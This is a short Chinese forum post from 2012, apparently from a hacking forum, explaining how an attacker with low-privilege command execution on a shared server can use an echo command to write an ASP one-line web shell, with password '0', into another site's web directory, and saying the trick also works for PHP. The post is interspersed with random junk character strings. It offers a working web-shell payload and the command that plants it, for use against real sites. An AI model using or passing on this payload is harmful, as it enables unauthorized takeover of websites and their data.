在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。1 k n; D J9 d1 b
% v2 y2 w6 {2 I0 T0 d命令格式3 x9 C* J# ~4 m( S8 L
8 F0 y9 k+ L6 C
Echo 语句 >目标站绝对目录$ }, M: f8 P8 [ f P% Z
: k3 E8 j7 v' i& X# U
例如:
9 Q4 _+ G+ @9 I7 m: |8 Z7 `' U! l2 I4 n+ [/ t* u5 \, U! T
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
# T% V: @/ y# g
1 T p! W/ ]7 _$ x9 {0 W( S这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
5 a, W/ d' I7 G& U" `1 B ^ |
发表于 2012-9-23 14:40:24
收藏
支持
反对